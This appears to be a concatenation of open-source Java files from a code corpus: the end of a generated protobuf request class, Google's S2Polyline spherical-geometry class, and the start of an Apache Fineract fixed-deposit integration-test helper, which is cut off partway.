@@protoc_insertion_point(class_scope:google.cloud.networkservices.v1.UpdateMeshRequest) private static final com.google.cloud.networkservices.v1.UpdateMeshRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.networkservices.v1.UpdateMeshRequest(); } public static com.google.cloud.networkservices.v1.UpdateMeshRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<UpdateMeshRequest> PARSER = new com.google.protobuf.AbstractParser<UpdateMeshRequest>() { @java.lang.Override public UpdateMeshRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<UpdateMeshRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<UpdateMeshRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.networkservices.v1.UpdateMeshRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
google/s2-geometry-library-java
35,903
library/src/com/google/common/geometry/S2Polyline.java
/* * Copyright 2006 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.common.geometry; import static java.lang.Math.PI; import static java.lang.Math.asin; import static java.lang.Math.atan2; import static java.lang.Math.max; import static java.lang.Math.min; import static java.lang.Math.sin; import com.google.common.base.Preconditions; import com.google.common.collect.Lists; import com.google.common.geometry.PrimitiveArrays.Bytes; import com.google.common.geometry.PrimitiveArrays.Cursor; import com.google.common.geometry.S2EdgeUtil.EdgeCrosser; import com.google.common.geometry.S2Projections.FaceSiTi; import com.google.common.geometry.S2ShapeUtil.S2EdgeVectorShape; import com.google.errorprone.annotations.InlineMe; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.io.Serializable; import java.util.ArrayList; import java.util.Arrays; import java.util.Collections; import java.util.List; import java.util.Objects; import java.util.function.Predicate; import java.util.logging.Logger; import jsinterop.annotations.JsConstructor; import jsinterop.annotations.JsIgnore; import jsinterop.annotations.JsType; /** * An S2Polyline represents a sequence of zero or more vertices connected by straight edges * (geodesics). Edges of length 0 and 180 degrees are not allowed, i.e. adjacent vertices should not * be identical or antipodal. An S2Polyline with a single vertex generally represents a degenerate * edge. In particular, an S2Polyline can be viewed as an S2Shape via {@link #shape()}, and a single * vertex S2Polyline will be presented as an S2Shape with one degenerate edge. * * S2Polylines are immutable. * * <p>Note: Polylines do not have a contains(S2Point) method, because "containment" is not * numerically well-defined except at the polyline vertices. * * @author shakusa@google.com (Steven Hakusa) ported from util/geometry * @author ericv@google.com (Eric Veach) original author */ @JsType public final class S2Polyline implements S2Shape, S2Region, Serializable { private static final Logger log = Platform.getLoggerForClass(S2Polyline.class); private static final S2Point[] ARR_TEMPLATE = {}; private static final byte LOSSLESS_ENCODING_VERSION = 1; private static final byte COMPRESSED_ENCODING_VERSION = 2; /** A fast {@link S2Coder} of polylines that uses {@link #encode} and {@link #decode}. */ public static final S2Coder<S2Polyline> FAST_CODER = new S2Coder<S2Polyline>() { @Override public void encode(S2Polyline value, OutputStream output) throws IOException { value.encodeUncompressed(new LittleEndianOutput(output)); } @Override public S2Polyline decode(Bytes data, Cursor cursor) throws IOException { return S2Polyline.decode(data.toInputStream(cursor)); } @Override public boolean isLazy() { return false; } }; /** A fast {@link S2Coder} of polylines that uses {@link #encode} and {@link #decode}. */ public static final S2Coder<S2Polyline> COMPACT_CODER = new S2Coder<S2Polyline>() { @Override public void encode(S2Polyline value, OutputStream output) throws IOException { value.encodeCompact(output); } @Override public S2Polyline decode(Bytes data, Cursor cursor) throws IOException { return S2Polyline.decode(data.toInputStream(cursor)); } @Override public boolean isLazy() { return false; } }; private final int numVertices; private final S2Point[] vertices; /** * Create a polyline that connects the given vertices, which are copied. Empty polylines are * allowed. Single-vertex polylines are allowed but are not valid in all contexts; they generally * are considered to represent a degenerate edge. Adjacent vertices must not be identical or * antipodal. All vertices must be unit length. */ @JsIgnore public S2Polyline(List<S2Point> vertices) { this(vertices.toArray(ARR_TEMPLATE)); } /** Copy constructor. */ @JsIgnore public S2Polyline(S2Polyline other) { this(other.vertices().toArray(ARR_TEMPLATE)); } /** * As {@link S2Polyline(List)}, creates a polyline that connects the given vertices, but takes * ownership of the provided array of points which may not be further modified by the caller. All * vertices must be unit length. */ @JsConstructor S2Polyline(S2Point[] vertices) { // assert isValid(vertices); this.numVertices = vertices.length; this.vertices = vertices; } /** Returns an unmodifiable view of the vertices of this polyline. */ public List<S2Point> vertices() { return Collections.unmodifiableList(Arrays.asList(vertices)); } /** * Checks that the polyline is valid. If any problem is found, fills in the provided error and * returns true. Otherwise returns false. */ public boolean findValidationError(S2Error error) { // All vertices must be unit length. int n = vertices.length; for (int i = 0; i < n; ++i) { if (!S2.isUnitLength(vertices[i])) { error.init(S2Error.Code.NOT_UNIT_LENGTH, "Vertex " + i + " is not unit length"); return true; } } // Adjacent vertices must not be identical or antipodal. for (int i = 1; i < n; ++i) { if (vertices[i - 1].equalsPoint(vertices[i])) { error.init( S2Error.Code.DUPLICATE_VERTICES, "Vertices " + (i - 1) + " and " + i + " are identical"); return true; } if (vertices[i - 1].equalsPoint(S2Point.neg(vertices[i]))) { error.init( S2Error.Code.ANTIPODAL_VERTICES, "Vertices " + (i - 1) + " and " + i + " are antipodal"); return true; } } return false; } /** * Return true if the polyline is valid, having all vertices unit length and having no identical * or antipodal adjacent vertices. */ public boolean isValid() { return isValid(vertices()); } /** Return true if the given vertices form a valid polyline. */ @JsIgnore public static boolean isValid(List<S2Point> vertices) { // All vertices must be unit length. int n = vertices.size(); for (int i = 0; i < n; ++i) { if (!S2.isUnitLength(vertices.get(i))) { log.info("Vertex " + i + " is not unit length"); return false; } } // Adjacent vertices must not be identical or antipodal. for (int i = 1; i < n; ++i) { if (vertices.get(i - 1).equalsPoint(vertices.get(i)) || vertices.get(i - 1).equalsPoint(S2Point.neg(vertices.get(i)))) { log.info("Vertices " + (i - 1) + " and " + i + " are identical or antipodal"); return false; } } return true; } public int numVertices() { return numVertices; } public S2Point vertex(int k) { // assert (k >= 0 && k < numVertices); return vertices[k]; } /** Return the angle corresponding to the total arclength of the polyline on a unit sphere. */ public S1Angle getArclengthAngle() { double lengthSum = 0; for (int i = 1; i < numVertices(); ++i) { lengthSum += vertex(i - 1).angle(vertex(i)); } return S1Angle.radians(lengthSum); } /** * Return the true centroid of the polyline multiplied by the length of the polyline. (See the * "About centroids" comments of S2.java for details on centroids). The result is not unit length, * so you may want to normalize it. * * <p>Prescaling by the polyline length makes it easy to compute the centroid of several polylines * by simply adding up their centroids. */ public S2Point getCentroid() { return S2ShapeMeasures.polylineCentroid(this, /* chainId= */ 0); } /** * Return the point whose distance from vertex 0 along the polyline is the given fraction of the * polyline's total length. Fractions less than zero or greater than one are clamped. The return * value is unit length if this polyline is valid. This cost of this function is currently linear * in the number of vertices. * * @throws IllegalStateException if this polyline has no vertices. */ public S2Point interpolate(double fraction) { Preconditions.checkState(numVertices() > 0, "Empty polyline"); // We intentionally let the (fraction >= 1) case fall through, since we need to handle it in the // loop below in any case because of possible roundoff errors. if (fraction <= 0) { return vertex(0); } double lengthSum = 0; // radians for (int i = 1; i < numVertices(); ++i) { lengthSum += vertex(i - 1).angle(vertex(i)); } double target = fraction * lengthSum; // radians for (int i = 1; i < numVertices(); ++i) { double length = vertex(i - 1).angle(vertex(i)); if (target < length) { // This interpolates with respect to arc length rather than straight-line distance, and // produces a unit-length result. return S2EdgeUtil.getPointOnLine(vertex(i - 1), vertex(i), S1Angle.radians(target)); } target -= length; } return vertex(numVertices() - 1); } /** * Projects the query point to the nearest part of the polyline, and returns the fraction of the * polyline's total length traveled along the polyline from vertex 0 to the projected point. * * <p>For any query point, the returned fraction is at least 0 (when the query point projects to * the first vertex of the line) and at most 1 (when the query point projects to the last vertex). * * <p>This method is essentially the inverse of {@link #interpolate(double)}, except that this * method accepts any normalized point, whereas interpolate() only produces points on the line. * * <p>In the unusual case of multiple equidistant points on the polyline, one of the nearest * points is selected in a deterministic but unpredictable manner, and the fraction is computed up * to that position. For example, all points of the S2 edge from (1,0,0) to (0,1,0) are * equidistant from (0,0,1), so any fraction from 0 to 1 is a correct answer! * * <p>The polyline should not be empty. If it has fewer than 2 vertices the return value is zero. */ public double uninterpolate(S2Point queryPoint) { if (numVertices() == 1) { return 0; } int i = getNearestEdgeIndex(queryPoint); double arcLength = S2EdgeUtil.project(queryPoint, vertex(i), vertex(i + 1)).angle(vertex(i)); for (; i > 0; i--) { arcLength += vertex(i - 1).angle(vertex(i)); } return min(arcLength / getArclengthAngle().radians(), 1); } // S2Region interface (see S2Region.java for details): /** Return a bounding spherical cap. */ @Override public S2Cap getCapBound() { return getRectBound().getCapBound(); } /** Return a bounding latitude-longitude rectangle. */ @Override public S2LatLngRect getRectBound() { S2EdgeUtil.RectBounder bounder = new S2EdgeUtil.RectBounder(); for (int i = 0; i < numVertices(); ++i) { bounder.addPoint(vertex(i)); } return bounder.getBound(); } /** * If this method returns true, the region completely contains the given cell. Otherwise, either * the region does not contain the cell or the containment relationship could not be determined. */ @Override public boolean contains(S2Cell cell) { return false; } @Override public boolean contains(S2Point point) { return false; } /** * If this method returns false, the region does not intersect the given cell. Otherwise, either * region intersects the cell, or the intersection relationship could not be determined. */ @Override public boolean mayIntersect(S2Cell cell) { if (numVertices() == 0) { return false; } // We only need to check whether the cell contains vertex 0 for correctness, but these tests // are cheap compared to edge crossings so we might as well check all the vertices. for (int i = 0; i < numVertices(); ++i) { if (cell.contains(vertex(i))) { return true; } } S2Point[] cellVertices = new S2Point[4]; for (int i = 0; i < 4; ++i) { cellVertices[i] = cell.getVertex(i); } for (int j = 0; j < 4; ++j) { S2EdgeUtil.EdgeCrosser crosser = new S2EdgeUtil.EdgeCrosser(cellVertices[j], cellVertices[(j + 1) & 3], vertex(0)); for (int i = 1; i < numVertices(); ++i) { if (crosser.robustCrossing(vertex(i)) >= 0) { // There is a proper crossing, or two vertices were the same. return true; } } } return false; } /** * Removes any point from the given List of points that is exactly equal to to its next neighbor. * Valid S2Polylines may not have duplicate adjacent points, so this may be useful to make a list * of points into a valid polyline. The resulting list of points may have only one point. */ public static void deduplicatePoints(List<S2Point> linePoints) { if (linePoints.size() < 2) { return; } linePoints.removeIf( new Predicate<S2Point>() { S2Point last = null; @Override public boolean test(S2Point p) { boolean remove = last != null && p.equalsPoint(last); last = p; return remove; } }); } /** * Returns a new polyline where the vertices of the given polyline have been snapped to the * centers of cells at the specified level. */ public static S2Polyline fromSnapped(final S2Polyline a, int snapLevel) { // TODO(user): Use S2Builder when available. List<S2Point> snappedVertices = new ArrayList<>(a.numVertices()); S2Point prev = snapPointToLevel(a.vertex(0), snapLevel); snappedVertices.add(prev); for (int i = 1; i < a.numVertices(); i++) { S2Point curr = snapPointToLevel(a.vertex(i), snapLevel); if (!curr.equalsPoint(prev)) { prev = curr; snappedVertices.add(curr); } } return new S2Polyline(snappedVertices); } /** * Returns a new point, snapped to the center of the cell containing the given point at the * specified level. */ private static S2Point snapPointToLevel(final S2Point p, int level) { return S2CellId.fromPoint(p).parent(level).toPoint(); } /** * Return a subsequence of vertex indices such that the polyline connecting these vertices is * never further than "tolerance" from the original polyline. Provided the first and last vertices * are distinct, they are always preserved; if they are not, the subsequence may contain only a * single index. * * <p>Some useful properties of the algorithm: * * <ul> * <li>It runs in linear time. * <li>The output is always a valid polyline. In particular, adjacent output vertices are never * identical or antipodal. * <li>The method is not optimal, but it tends to produce 2-3% fewer vertices than the * Douglas-Peucker algorithm with the same tolerance. * <li>The output is *parametrically* equivalent to the original polyline to within the given * tolerance. For example, if a polyline backtracks on itself and then proceeds onwards, the * backtracking will be preserved (to within the given tolerance). This is different than * the Douglas-Peucker algorithm, which only guarantees geometric equivalence. * </ul> */ public S2Polyline subsampleVertices(S1Angle tolerance) { if (vertices.length == 0) { return this; } List<S2Point> results = Lists.newArrayList(); results.add(vertex(0)); S1Angle clampedTolerance = S1Angle.max(tolerance, S1Angle.ZERO); for (int i = 0; i < vertices.length - 1; ) { int nextIndex = findEndVertex(clampedTolerance, i); // Don't create duplicate adjacent vertices. if (!vertex(nextIndex).equalsPoint(vertex(i))) { results.add(vertex(nextIndex)); } i = nextIndex; } return new S2Polyline(results); } /** * Given a polyline, a tolerance distance, and a start index, this function returns the maximal * end index such that the line segment between these two vertices passes within "tolerance" of * all interior vertices, in order. */ private int findEndVertex(S1Angle tolerance, int index) { // assert tolerance.radians() >= 0; // assert index + 1 < polyline.num_vertices(); // The basic idea is to keep track of the "pie wedge" of angles from the starting vertex such // that a ray from the starting vertex at that angle will pass through the discs of radius // "tolerance" centered around all vertices processed so far. // First we define a "coordinate frame" for the tangent and normal spaces at the starting // vertex. Essentially this means picking three orthonormal vectors X,Y,Z such that X and Y // span the tangent plane at the starting vertex, and Z is "up". We use the coordinate frame to // define a mapping from 3D direction vectors to a one-dimensional "ray angle" in the range // (-Pi, Pi]. The angle of a direction vector is computed by transforming it into the X,Y,Z // basis, and then calculating atan2(y,x). This mapping allows us to represent a wedge of // angles as a 1D interval. Since the interval wraps around, we represent it as an S1Interval, // i.e. an interval on the unit circle. S2Point origin = vertex(index); Matrix frame = S2.getFrame(origin); // As we go along, we keep track of the current wedge of angles and the distance to the last // vertex (which must be non-decreasing). S1Interval currentWedge = S1Interval.full(); double lastDistance = 0; for (++index; index < vertices.length; ++index) { S2Point candidate = vertex(index); double distance = origin.angle(candidate); // We don't allow simplification to create edges longer than 90 degrees, to avoid numeric // instability as lengths approach 180 degrees. (We do need to allow for original edges // longer than 90 degrees, though.) if (distance > PI / 2 && lastDistance > 0) { break; } // Vertices must be in increasing order along the ray, except for the initial disc around the // origin. if (distance < lastDistance && lastDistance > tolerance.radians()) { break; } lastDistance = distance; // Points that are within the tolerance distance of the origin do not constrain the ray // direction, so we can ignore them. if (distance <= tolerance.radians()) { continue; } // If the current wedge of angles does not contain the angle to this vertex, then stop right // now. Note that the wedge of possible ray angles is not necessarily empty yet, but we can't // continue unless we are willing to backtrack to the last vertex that was contained within // the wedge (since we don't create new vertices). This would be more complicated and also // make the worst-case running time more than linear. S2Point direction = S2.toFrame(frame, candidate); double center = atan2(direction.y, direction.x); if (!currentWedge.contains(center)) { break; } // To determine how this vertex constrains the possible ray angles, consider the triangle ABC // where A is the origin, B is the candidate vertex, and C is one of the two tangent points // between A and the spherical cap of radius "tolerance" centered at B. Then from the // spherical law of sines, sin(a)/sin(A) = sin(c)/sin(C), where "a" and "c" are the lengths of // the edges opposite A and C. In our case C is a 90 degree angle, therefore // A = asin(sin(a) / sin(c)). Angle A is the half-angle of the allowable wedge. double halfAngle = asin(sin(tolerance.radians()) / sin(distance)); S1Interval target = S1Interval.fromPoint(center).expanded(halfAngle); currentWedge = currentWedge.intersection(target); // assert !currentWedge.isEmpty(); } // We break out of the loop when we reach a vertex index that can't be included in the line // segment, so back up by one vertex. return index - 1; } /** * Given a point, which must be normalized, returns the index of the start point of the (first) * edge on this polyline that is closest to the given point. This polyline must have at least one * vertex. * * @throws IllegalStateException if this polyline does not have any vertices * @throws IllegalArgumentException if 'point' is not unit length */ public int getNearestEdgeIndex(S2Point point) { Preconditions.checkState(numVertices() > 0, "Empty polyline"); if (numVertices() == 1) { // If there is only one vertex, the "edge" is trivial, and it's the only one return 0; } // Initial value larger than any possible distance on the unit sphere. S1Angle minDistance = S1Angle.radians(10); int minIndex = -1; // Find the line segment in the polyline that is closest to the point given. for (int i = 0; i < numVertices() - 1; ++i) { S1Angle distanceToSegment = S2EdgeUtil.getDistance(point, vertex(i), vertex(i + 1)); if (distanceToSegment.lessThan(minDistance)) { minDistance = distanceToSegment; minIndex = i; } } return minIndex; } /** * Given a point p and the index of the start point of an edge of this polyline, returns the point * on that edge that is closest to p. The point must be unit length. * * @throws IllegalStateException if this polyline does not have any vertices * @throws IllegalArgumentException if the given index is out of range for this polyline */ public S2Point projectToEdge(S2Point point, int index) { Preconditions.checkState(numVertices() > 0, "Empty polyline"); Preconditions.checkArgument( numVertices() == 1 || index < numVertices() - 1, "Invalid edge index"); if (numVertices() == 1) { // If there is only one vertex, it is always closest to any given point. return vertex(0); } return S2EdgeUtil.project(point, vertex(index), vertex(index + 1)); } /** * Returns the point on this polyline closest to {@code queryPoint}, which must be normalized. * This polyline must have at least one point. * * <p>In the unusual case of a query point that is equidistant from multiple points on the line, * one is returned in a deterministic but otherwise unpredictable way. * * @throws IllegalStateException if this polyline does not have any vertices * @throws IllegalArgumentException if 'queryPoint' is not unit length */ public S2Point project(S2Point queryPoint) { Preconditions.checkState(numVertices() > 0, "Empty polyline"); if (numVertices() == 1) { // If there is only one vertex, it is always closest to any given point. return vertex(0); } int i = getNearestEdgeIndex(queryPoint); return S2EdgeUtil.project(queryPoint, vertex(i), vertex(i + 1)); } @Override public boolean equals(Object that) { if (!(that instanceof S2Polyline)) { return false; } S2Polyline thatPolyline = (S2Polyline) that; if (numVertices != thatPolyline.numVertices) { return false; } for (int i = 0; i < vertices.length; i++) { if (!vertices[i].equalsPoint(thatPolyline.vertices[i])) { return false; } } return true; } /** * Return true if this polyline intersects the given polyline. If the polylines share a vertex * they are considered to be intersecting. When a polyline endpoint is the only intersection with * the other polyline, the function may return true or false arbitrarily. * * <p>The running time is quadratic in the number of vertices. */ public boolean intersects(S2Polyline line) { if (numVertices() <= 0 || line.numVertices() <= 0) { return false; } if (!getRectBound().intersects(line.getRectBound())) { return false; } // TODO(user): Use S2ShapeIndex here. for (int i = 1; i < numVertices(); ++i) { EdgeCrosser crosser = new EdgeCrosser(vertex(i - 1), vertex(i), line.vertex(0)); for (int j = 1; j < line.numVertices(); ++j) { if (crosser.robustCrossing(line.vertex(j)) >= 0) { return true; } } } return false; } @Override public int hashCode() { return Objects.hash(numVertices, Arrays.deepHashCode(vertices)); } @Override public String toString() { StringBuilder builder = new StringBuilder("S2Polyline, "); builder.append(vertices.length).append(" points. ["); for (S2Point v : vertices) { builder.append(v.toDegreesString()).append(" "); } builder.append("]"); return builder.toString(); } // S2Shape interface (see S2Shape.java for details): private transient S2Shape shape; /** * Returns an S2Shape view of this polyline. * * <p>Note that while a valid S2Polyline may have a single vertex, the S2Shape API only supports * edges organized into chains. Therefore, shape() presents single-vertex S2Polylines as a one * dimensional S2Shape with a single degenerate edge, in a one-edge chain. */ public S2Shape shape() { if (shape == null) { if (numVertices == 1) { S2EdgeVectorShape evs = new S2EdgeVectorShape(); evs.addDegenerate(vertices[0]); shape = evs; } else { // Zero vertices or >=2 vertices. shape = new S2Shape() { @Override public int numEdges() { return max(0, numVertices - 1); } @Override public void getEdge(int index, MutableEdge result) { result.set(vertices[index], vertices[index + 1]); } @Override public boolean hasInterior() { return false; } @Override public boolean containsOrigin() { throw new IllegalStateException( "An S2Polyline has no interior, so containsOrigin()" + " should never be called on one."); } @Override public int numChains() { return (numVertices > 1) ? 1 : 0; } @Override public int getChainStart(int chainId) { Preconditions.checkElementIndex(chainId, numChains()); return 0; } @Override public int getChainLength(int chainId) { Preconditions.checkElementIndex(chainId, numChains()); return numEdges(); } @Override public void getChainEdge(int chainId, int offset, MutableEdge result) { Preconditions.checkElementIndex(chainId, numChains()); getEdge(offset, result); } @Override public S2Point getChainVertex(int chainId, int edgeOffset) { Preconditions.checkElementIndex(chainId, numChains()); return vertex(edgeOffset); } @Override public void getChainPosition(int edgeId, ChainPosition result) { // All the edges are in the single chain. result.set(0, edgeId); } @Override public int dimension() { return 1; } }; } } return shape; } /** @deprecated Use shape().numEdges() */ @Deprecated @InlineMe(replacement = "this.shape().numEdges()") @Override public int numEdges() { return shape().numEdges(); } /** @deprecated Use shape().getEdge(index, result) */ @Deprecated @InlineMe(replacement = "this.shape().getEdge(index, result)") @Override public void getEdge(int index, MutableEdge result) { shape().getEdge(index, result); } /** @deprecated Use shape().hasInterior() */ @Deprecated @InlineMe(replacement = "this.shape().hasInterior()") @Override public boolean hasInterior() { return shape().hasInterior(); } /** @deprecated Use shape().containsOrigin() */ @Deprecated @InlineMe(replacement = "this.shape().containsOrigin()") @Override public boolean containsOrigin() { return shape().containsOrigin(); } /** @deprecated Use shape().numChains() */ @Deprecated @InlineMe(replacement = "this.shape().numChains()") @Override public int numChains() { return shape().numChains(); } /** @deprecated Use shape().getChainStart(chainId) */ @Deprecated @InlineMe(replacement = "this.shape().getChainStart(chainId)") @Override public int getChainStart(int chainId) { return shape().getChainStart(chainId); } /** @deprecated Use shape().getChainLength(chainId) */ @Deprecated @InlineMe(replacement = "this.shape().getChainLength(chainId)") @Override public int getChainLength(int chainId) { return shape().getChainLength(chainId); } /** @deprecated Use shape().getChainEdge(chainId, offset, result) */ @Deprecated @InlineMe(replacement = "this.shape().getChainEdge(chainId, offset, result)") @Override public void getChainEdge(int chainId, int offset, MutableEdge result) { shape().getChainEdge(chainId, offset, result); } /** @deprecated Use shape().getChainVertex(chainId, edgeOffset) */ @Deprecated @InlineMe(replacement = "this.shape().getChainVertex(chainId, edgeOffset)") @Override public S2Point getChainVertex(int chainId, int edgeOffset) { return shape().getChainVertex(chainId, edgeOffset); } /** @deprecated Use shape().getChainPosition(edgeId, result) */ @Deprecated @InlineMe(replacement = "this.shape().getChainPosition(edgeId, result)") @Override public void getChainPosition(int edgeId, ChainPosition result) { shape().getChainPosition(edgeId, result); } /** @deprecated Use shape().dimension() */ @Deprecated @InlineMe(replacement = "this.shape().dimension()") @Override public int dimension() { return shape().dimension(); } /** Encodes this polyline into the given output stream. */ @JsIgnore // OutputStream is not available to J2CL. public void encode(OutputStream os) throws IOException { encodeUncompressed(new LittleEndianOutput(os)); } /** * Encodes the polyline into an efficient, lossless binary representation, which can be decoded by * calling {@link S2Polyline#decode}. The encoding is byte-compatible with the C++ version of the * S2 library. * * @param output The output stream into which the encoding should be written. * @throws IOException if there was a problem writing into the output stream. */ @JsIgnore // OutputStream is not available to J2CL. public void encodeCompact(OutputStream output) throws IOException { int level = numVertices == 0 ? S2CellId.MAX_LEVEL : getBestSnapLevel(); LittleEndianOutput encoder = new LittleEndianOutput(output); if (level == -1) { encodeUncompressed(encoder); } else { encodeCompressed(level, encoder); } } /** Encodes this polyline into the given little endian output stream. */ void encodeUncompressed(LittleEndianOutput os) throws IOException { os.writeByte(LOSSLESS_ENCODING_VERSION); os.writeInt(numVertices); for (S2Point p : vertices) { p.encode(os); } } /** Encodes a compressed polyline at requested snap level. */ void encodeCompressed(int snapLevel, LittleEndianOutput encoder) throws IOException { encoder.writeByte(COMPRESSED_ENCODING_VERSION); encoder.writeByte((byte) snapLevel); encoder.writeVarint32(numVertices); S2PointCompression.encodePointsCompressed(vertices(), snapLevel, encoder); } @JsIgnore // InputStream is not available to J2CL. public static S2Polyline decode(InputStream is) throws IOException { return decode(new LittleEndianInput(is)); } static S2Polyline decode(LittleEndianInput decoder) throws IOException { byte version = decoder.readByte(); switch (version) { case LOSSLESS_ENCODING_VERSION: return decodeLossless(decoder); case COMPRESSED_ENCODING_VERSION: return decodeCompressed(decoder); default: throw new IOException("Unsupported S2Polyline encoding version " + version); } } private static S2Polyline decodeLossless(LittleEndianInput is) throws IOException { int length = is.readInt(); if (length < 0) { throw new IOException("Invalid length " + length); } S2Point[] vertices = new S2Point[length]; for (int i = 0; i < vertices.length; i++) { vertices[i] = S2Point.decode(is); } return new S2Polyline(vertices); } private static S2Polyline decodeCompressed(LittleEndianInput decoder) throws IOException { int level = decoder.readByte(); if (level > S2CellId.MAX_LEVEL || level < 0) { throw new IOException("Invalid level " + level); } int numVertices = decoder.readVarint32(); if (numVertices < 0) { throw new IOException("Invalid number of vertices: " + numVertices); } return new S2Polyline(S2PointCompression.decodePointsCompressed(numVertices, level, decoder)); } /** * If all of the polyline's vertices happen to be the centers of S2Cells at some level, then * returns that level, otherwise returns -1. See also {@link #fromSnapped(S2Polyline, int)}. * Returns -1 if the polyline has no vertices. */ public int getSnapLevel() { int snapLevel = -1; for (S2Point p : vertices) { FaceSiTi faceSiTi = S2Projections.xyzToFaceSiTi(p); int level = S2Projections.levelIfCenter(faceSiTi, p); if (level < 0) { // Vertex is not a cell center. return level; } if (level != snapLevel) { if (snapLevel < 0) { // First vertex. snapLevel = level; } else { // Vertices at more than one cell level. return -1; } } } return snapLevel; } /** * Computes the level at which most of the vertices are snapped. If multiple levels have the same * maximum number of vertices snapped to it, the first one (lowest level number / largest area / * smallest encoding length) will be chosen, so this is desired. Returns -1 for unsnapped * polylines. */ int getBestSnapLevel() { int[] histogram = new int[S2CellId.MAX_LEVEL + 1]; for (S2Point p : vertices) { FaceSiTi faceSiTi = S2Projections.xyzToFaceSiTi(p); int level = S2Projections.levelIfCenter(faceSiTi, p); // Level is -1 for unsnapped points. if (level >= 0) { histogram[level]++; } } int snapLevel = 0; for (int i = 1; i < histogram.length; i++) { if (histogram[i] > histogram[snapLevel]) { snapLevel = i; } } if (histogram[snapLevel] == 0 && numVertices > 0) { // This is an unsnapped polyline. return -1; } return snapLevel; } /*** * Returns a new S2Polyline with reversed order of vertices to the original. */ public S2Polyline reversed() { return new S2Polyline(Lists.reverse(vertices())); } }
apache/fineract
36,029
integration-tests/src/test/java/org/apache/fineract/integrationtests/common/fixeddeposit/FixedDepositAccountHelper.java
/** * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.fineract.integrationtests.common.fixeddeposit; import com.google.gson.Gson; import io.restassured.specification.RequestSpecification; import io.restassured.specification.ResponseSpecification; import java.util.ArrayList; import java.util.Calendar; import java.util.HashMap; import java.util.List; import org.apache.fineract.integrationtests.common.CommonConstants; import org.apache.fineract.integrationtests.common.Utils; import org.slf4j.Logger; import org.slf4j.LoggerFactory; @SuppressWarnings({ "unused", "rawtypes" }) public class FixedDepositAccountHelper { private static final Logger LOG = LoggerFactory.getLogger(FixedDepositAccountHelper.class); private final RequestSpecification requestSpec; private final ResponseSpecification responseSpec; // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public FixedDepositAccountHelper(final RequestSpecification requestSpec, final ResponseSpecification responseSpec) { this.requestSpec = requestSpec; this.responseSpec = responseSpec; } private static final String FIXED_DEPOSIT_ACCOUNT_URL = "/fineract-provider/api/v1/fixeddepositaccounts"; private static final String APPLY_FIXED_DEPOSIT_ACCOUNT_URL = FIXED_DEPOSIT_ACCOUNT_URL + "?" + Utils.TENANT_IDENTIFIER; private static final String APPROVE_FIXED_DEPOSIT_COMMAND = "approve"; private static final String UNDO_APPROVAL_FIXED_DEPOSIT_COMMAND = "undoapproval"; private static final String REJECT_FIXED_DEPOSIT_COMMAND = "reject"; private static final String WITHDRAWN_BY_CLIENT_FIXED_DEPOSIT_COMMAND = "withdrawnByApplicant"; private static final String ACTIVATE_FIXED_DEPOSIT_COMMAND = "activate"; private static final String CLOSE_FIXED_DEPOSIT_COMMAND = "close"; private static final String POST_INTEREST_FIXED_DEPOSIT_COMMAND = "postInterest"; private static final String CALCULATE_INTEREST_FIXED_DEPOSIT_COMMAND = "calculateInterest"; private static final String CALCULATE_PREMATURE_AMOUNT_COMMAND = "calculatePrematureAmount"; private static final String PREMATURE_CLOSE_COMMAND = "prematureClose"; private static final String LOCALE = "en_GB"; private static final String DIGITS_AFTER_DECIMAL = "4"; private static final String IN_MULTIPLES_OF = "100"; private static final String USD = "USD"; public static final String DAYS = "0"; private static final String WEEKS = "1"; private static final String MONTHS = "2"; private static final String YEARS = "3"; private static final String DAILY = "1"; private static final String MONTHLY = "4"; private static final String QUARTERLY = "5"; private static final String BI_ANNUALLY = "6"; private static final String ANNUALLY = "7"; private static final String INTEREST_CALCULATION_USING_DAILY_BALANCE = "1"; private static final String INTEREST_CALCULATION_USING_AVERAGE_DAILY_BALANCE = "2"; private static final String DAYS_360 = "360"; private static final String DAYS_365 = "365"; public static final String DEPOSIT_AMOUNT = "100000"; private String newDepositAmount = null; private String interestCompoundingPeriodType = MONTHLY; private String interestPostingPeriodType = MONTHLY; private String interestCalculationType = INTEREST_CALCULATION_USING_DAILY_BALANCE; private String lockinPeriodFrequency = "1"; private String lockingPeriodFrequencyType = MONTHS; private final String minDepositTerm = "6"; private final String minDepositTermTypeId = MONTHS; private final String maxDepositTerm = "10"; private final String maxDepositTermTypeId = YEARS; private final String inMultiplesOfDepositTerm = "2"; private final String inMultiplesOfDepositTermTypeId = MONTHS; private final String preClosurePenalInterest = "2"; private String 